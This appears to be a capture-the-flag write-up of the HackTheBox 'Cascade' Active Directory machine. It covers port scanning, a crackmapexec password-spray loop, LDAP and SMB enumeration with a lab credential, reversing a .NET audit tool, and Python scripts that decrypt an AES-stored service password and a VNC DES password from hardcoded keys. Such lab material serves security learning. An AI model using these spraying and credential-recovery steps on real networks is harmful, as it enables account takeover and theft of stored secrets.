Hey, good to be back writing again. I rooted this machine today and really liked it, so I want to share with you how you can root it too.
First, I started by scanning the open ports on the machine.
rustscan -a 10.10.10.182 --ulimit 5000
I used rustscan and it only gave me DNS, Kerberos, SMB and LDAP, while there were other ports open. Unfortunately that was because of the --ulimit flag (a big batch size can drop results). For this box it wasn't a big deal, but I wanted to point out that you should double-check your tools, and if you can have a couple of tools that serve the same purpose, that's great.
From the nmap script scan I got the domain name, cascade.local, so let's update our hosts file.
sudo sh -c 'echo "10.10.10.182 cascade.local" >> /etc/hosts'
SMB
I like to start by enumerating SMB shares and digging into them, so I tried a null session, but it didn't work out.
When I was solving this I had just done a previous machine where a user had his username as his password, so I tried to spray that.
Before you spray, look up the lockout threshold; for this machine there is no lockout threshold.
We'll try a password spray (using the username as the password in this context).
As always there are many tools that can help you brute force, and for no particular reason I wanted to use crackmapexec. But there is a catch: if you pass the user list to both -u and -p, crackmapexec tries every username against every password instead of pairing them one to one (unless you add --no-bruteforce), so I looped over the list instead:
for user in $(cat users); do crackmapexec smb 10.10.10.182 -u "$user" -p "$user"; done
I also tried a dictionary attack (SecLists), but that didn't work either.
Okay, this wasn't the way to the initial foothold on this machine, but it's good to test everything.
Since we still don't have any credentials we can try AS-REP Roasting, but that is a dead end too.
cat usersfull | grep -i description -n -B 5
12-objectClass: top
13-objectClass: person
14-objectClass: organizationalPerson
15-objectClass: user
16-cn: CascGuest
17:description: Built-in account for guest access to the computer/domain
We only get a description for CascGuest; the description field of every other user is empty.
So maybe one of the users carries a unique (non-standard) attribute instead.
Okay, I used AI for this, but man, it makes our life a lot easier.
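The hunt for a "unique field" can be automated. The script below is an added example, not part of the original write-up: it parses an ldapsearch/LDIF-style dump such as usersfull (including base64-encoded `attr:: value` lines and folded continuation lines), lists the user accounts, and reports every attribute that occurs on only one object, which is exactly what makes a custom attribute stand out when all the other accounts look identical. The embedded sample dump is constructed for this example: only the account names come from the box, the `info` attribute and all the values are made up.

```python
import base64
import re
import sys
from collections import Counter

# Constructed sample in ldapsearch/LDIF style, modelled on the usersfull dump.
# Only the account names come from the box; the `info` attribute and every
# value below are made up for this example.
SAMPLE_LDIF = """\
dn: CN=CascGuest,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: CascGuest
sAMAccountName: CascGuest
description: Built-in account for guest access to the computer/domain

dn: CN=Ryan Thompson,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sAMAccountName: r.thompson
info:: ZXhhbXBsZS1vbmx5

dn: CN=Steve Smith,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Steve Smith
sAMAccountName: s.smith
"""

# "attr: value" or "attr:: base64value"
ATTR_LINE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Parse ldapsearch/LDIF output into a list of {attribute: [values]} dicts.

    Handles `attr: value`, base64 `attr:: value`, folded lines (a line that
    starts with one space continues the previous value), `#` comments and
    blank-line record separators.
    """
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)

    entries, current = [], {}
    for line in unfolded + [""]:          # the trailing "" flushes the last record
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue                      # not an attribute line (referrals etc.)
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(attr, []).append(value)
    return entries


def list_users(entries):
    """sAMAccountName of every entry whose objectClass includes user."""
    return [e["sAMAccountName"][0] for e in entries
            if "user" in e.get("objectClass", []) and "sAMAccountName" in e]


def rare_attributes(entries, max_count=1):
    """Attributes set on at most max_count objects, mapped to (account, values).

    Standard attributes (objectClass, cn, ...) are on every object, so a
    custom attribute present on a single account stands out immediately.
    """
    counts = Counter(attr for e in entries for attr in e)
    rare = {}
    for e in entries:
        who = e.get("sAMAccountName", e.get("dn", ["?"]))[0]
        for attr, values in e.items():
            if counts[attr] <= max_count:
                rare.setdefault(attr, []).append((who, values))
    return rare


if __name__ == "__main__":
    if len(sys.argv) > 1:
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        text = SAMPLE_LDIF
    entries = parse_ldif(text)
    print("users:", ", ".join(list_users(entries)))
    for attr, hits in sorted(rare_attributes(entries).items()):
        for who, values in hits:
            print(f"rare attribute {attr} on {who}: {values}")
```

Run it with the path to your own dump as the first argument. On the sample, description is reported as rare only because, as on the real box, CascGuest is the only account that has one; a second rare attribute on a single user is the kind of thing worth reading closely.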
The Data share is interesting, let's dig into it. We got 4 files:
* Meeting_Notes_June_2018.html
* ArkAdRecycleBin.log
* dcdiag.log
* VNC Install.reg
smbclient //10.10.10.182/Data -U r.thompson 'rY4n5eva'
prompt off
recurse on
mget *
firefox Meeting_Notes_June_2018.html&
Well, the notes give a hint about a user (TempAdmin) that wasn't in our user list.
ArkAdRecycleBin.log
We can see that ArkSvc can delete objects, and that it deleted Test and TempAdmin.
dcdiag.log
* The KDC cannot find a suitable certificate for smart card logons.
* The DFS Namespace service couldn’t initialize cross-forest trust information.
* _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.cascade.local could not be resolved.
* The PDC Emulator has no external time source.
file CascAudit.exe
CascAudit.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60
sqlite3 Audit.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap ;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc ;
sqlite> -- the Misc table is empty
Let's dig into CascAudit.exe. In the main module it reads a row from the SQLite database and decrypts the stored password with a hardcoded key (c4scadek3y654321):
public static void Main()
{
if (MyProject.Application.CommandLineArgs.Count != 1)
{
Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
return;
}
checked
{
using (SQLiteConnection sqliteConnection = new SQLiteConnection("Data Source=" + MyProject.Application.CommandLineArgs[0] + ";Version=3;"))
{
string str = string.Empty;
string password = string.Empty;
string str2 = string.Empty;
try
{
sqliteConnection.Open();
using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
{
using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
{
sqliteDataReader.Read();
str = Conversions.ToString(sqliteDataReader["Uname"]);
str2 = Conversions.ToString(sqliteDataReader["Domain"]);
string encryptedString = Conversions.ToString(sqliteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
}
catch (Exception ex)
{
Console.WriteLine("Error decrypting password: " + ex.Message);
return;
}
}
}
sqliteConnection.Close();
}
Now let's run the program under a .NET debugger with the path to Audit.db as its only argument and break on sqliteConnection.Close(); .
When the breakpoint hits, encryptedString is exactly the Pwd value we saw in the Ldap table of Audit.db (it is AES ciphertext, not a hash),
and the password local now holds the cleartext password for ArkSvc.
If for some reason we couldn't debug, we can read the Crypto class in CascCrypto.dll instead. EncryptString tells us everything we need: the IV is hardcoded too, and the decompiler shows the enum values as plain integers.
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace CascCrypto
{
// Token: 0x02000007 RID: 7
public class Crypto
{
// Token: 0x06000012 RID: 18 RVA: 0x00002290 File Offset: 0x00000690
public static string EncryptString(string Plaintext, string Key)
{
byte[] bytes = Encoding.UTF8.GetBytes(Plaintext);
Aes aes = Aes.Create();
aes.BlockSize = 128;
aes.KeySize = 128; // AES-128: the 16-character key passed in from CascAudit.exe
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842"); // static, hardcoded IV
aes.Key = Encoding.UTF8.GetBytes(Key);
aes.Mode = 1; // CipherMode.CBC; padding is left at the .NET default, PKCS7
string result;
using (MemoryStream memoryStream = new MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateEncryptor(), 1)) // CryptoStreamMode.Write
{
cryptoStream.Write(bytes, 0, bytes.Length);
cryptoStream.FlushFinalBlock();
}
result = Convert.ToBase64String(memoryStream.ToArray()); // what ends up in the Pwd column
}
return result;
}
// DecryptString (not shown) reverses this with the same key and IV
}
}
With the key, IV, mode and padding known, I used AI to generate a Python script (pycryptodome) that reproduces DecryptString and decrypts the value we have:
from Crypto.Cipher import AES # pycryptodome
from Crypto.Util.Padding import unpad
import base64
# Pwd column of the Ldap table in Audit.db (the ArkSvc row)
encrypted_text_b64 = "BQO5l5Kj9MdErXx6Q6AGOw=="
# Key hardcoded in CascAudit.exe, IV hardcoded in CascCrypto.dll; both must be exactly 16 bytes
key = b"c4scadek3y654321"
iv = b"1tdyjCbY1Ix49842"
# Decode Base64 to get the raw ciphertext
encrypted_text = base64.b64decode(encrypted_text_b64)
# Same parameters as CascCrypto: AES-128 in CBC mode
cipher = AES.new(key, AES.MODE_CBC, iv)
# Decrypt and strip the PKCS7 padding (.NET's default)
try:
decrypted_bytes = cipher.decrypt(encrypted_text)
decrypted_password = unpad(decrypted_bytes, AES.block_size).decode('utf-8')
print("Decrypted Password:", decrypted_password)
except ValueError as e:
print("Decryption failed:", e)
From LDAP we dump users, groups, computers and objects.
There are many tools that can help you dump information from LDAP.
I like to make a list of users; it might help with brute forcing.
Since we used -o, windapsearch created a .tsv file, and we only want the usernames from it.
VNC Install.reg
At first I thought the hex in the Password value represented colours or something, but that wasn't the right path. After searching about VNC I found a GitHub repo that shows how to decrypt the password: VNC stores it DES-encrypted with a fixed, publicly known key, so it is trivially reversible,
and that gave us a potential password for s.smith.
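The decryption itself can be scripted. The block below is an added example in Python (the same language as the AES script above); it is not from the write-up nor from the GitHub repo the author found. It pulls the Password value out of a .reg export, handling regedit's UTF-16 encoding and backslash line continuations, builds the OpenSSL one-liner that decrypts it with the fixed VNC DES key, and decrypts locally when pycryptodome is installed. The embedded .reg fragment is constructed with placeholder bytes and a placeholder key path; the real value from the share is deliberately not reproduced.

```python
import re
import sys

# The fixed DES key every VNC flavour uses to obfuscate the stored password,
# in the bit order standard DES implementations (OpenSSL, pycryptodome)
# expect. It is public and identical on every install, so the "encryption"
# is reversible by anyone who can read the registry value.
VNC_DES_KEY = bytes.fromhex("e84adf645c7c1d52")

# Constructed stand-in for the Password line of a VNC Install.reg. The key
# path and the byte values are placeholders, not the value from the share.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVNC\Server]
"Port"=dword:0000170c
"Password"=hex:01,23,45,67,89,ab,cd,ef
'''


def load_reg(path):
    """Read a .reg export: regedit writes UTF-16LE with a BOM, older tools ANSI."""
    raw = open(path, "rb").read()
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("latin-1")


def reg_hex_values(reg_text, name="Password"):
    """Return the raw bytes of every REG_BINARY value called `name`.

    Matches lines like "Password"=hex:6b,cf,... after joining the
    backslash line continuations regedit inserts for long values.
    """
    unfolded = re.sub(r",\\\r?\n[ \t]*", ",", reg_text)
    pattern = re.compile(r'"%s"=hex:([0-9a-fA-F,]+)' % re.escape(name))
    return [bytes.fromhex(m.replace(",", "")) for m in pattern.findall(unfolded)]


def openssl_command(ciphertext):
    """Shell one-liner that recovers the plaintext without any Python library.

    Single-block DES-CBC with a zero IV and no padding is just DES-ECB over
    the 8 stored bytes. OpenSSL 3 may need `-provider legacy -provider default`
    in front of `-des-cbc`, because single DES moved to the legacy provider.
    """
    return (f"echo -n {ciphertext.hex()} | xxd -r -p | "
            f"openssl enc -des-cbc -d -nopad -K {VNC_DES_KEY.hex()} "
            f"-iv 0000000000000000 | xxd")


def decrypt_vnc_password(ciphertext):
    """Decrypt locally with pycryptodome (the library the AES script uses)."""
    from Crypto.Cipher import DES
    plain = DES.new(VNC_DES_KEY, DES.MODE_ECB).decrypt(ciphertext[:8])
    return plain.split(b"\x00", 1)[0].decode("latin-1")  # VNC NUL-pads to 8 bytes


if __name__ == "__main__":
    text = load_reg(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REG
    for blob in reg_hex_values(text):
        print("ciphertext:", blob.hex())
        print("openssl   :", openssl_command(blob))
        try:
            print("password  :", decrypt_vnc_password(blob))
        except ImportError:
            print("password  : install pycryptodome or run the openssl command")
```

Point it at the exported file (`python3 vncpw.py "VNC Install.reg"`); VNC passwords are capped at 8 characters, which is why a single DES block is all there is to decrypt.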